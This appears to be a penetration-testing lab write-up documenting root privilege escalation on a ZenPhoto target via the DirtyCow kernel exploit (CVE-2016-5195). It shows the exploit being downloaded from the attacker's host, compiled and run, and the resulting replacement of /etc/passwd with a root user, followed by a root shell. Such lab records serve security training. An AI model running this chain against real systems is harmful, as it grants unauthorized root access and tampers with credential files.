InfoSec LAB

ZenPhoto_Privilege_Escalation

Created: 2 min read

CVE-2016-5195

PEAS has identified that the target system is vulnerable to CVE-2016-5195

A vulnerability was found in Linux Kernel up to 4.2.3. It has been rated as critical. Affected by this issue is some unknown functionality of the component Kernel Memory Subsystem. The manipulation leads to race condition (Dirty COW). This vulnerability is handled as CVE-2016-5195. It is possible to launch the attack on the local host. Furthermore, there is an exploit available. This vulnerability has a historic impact due to its background and reception. It is recommended to upgrade the affected component.

Exploit (DirtyCow)

Exploit found online

Exploitation

www-data@offsecsrv:/var/tmp$ wget -q http://192.168.45.192/dirty.c

Delivery complete

www-data@offsecsrv:/var/tmp$ gcc -pthread dirty.c -o dirty -lcrypt

Compile

www-data@offsecsrv:/var/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: qwe123
 
Complete line:
firefart:fim3Q/wLL7UY6:0:0:pwned:/root:/bin/bash
 
mmap: b7745000
 
madvise 0
 
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'qwe123'.
 
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'qwe123'.
 
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

Exploit successful

www-data@offsecsrv:/var/tmp$ su firefart
Password: qwe123
 
firefart@offsecsrv:/var/tmp# whoami
firefart
firefart@offsecsrv:/var/tmp# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@offsecsrv:/var/tmp# hostname
offsecsrv
firefart@offsecsrv:/var/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:50:56:9e:20:a7 brd ff:ff:ff:ff:ff:ff
    inet 192.168.132.41/24 brd 192.168.132.255 scope global eth0
    inet6 fe80::250:56ff:fe9e:20a7/64 scope link 
       valid_lft forever preferred_lft forever

System level compromise

Interactive Graph View

Backlinks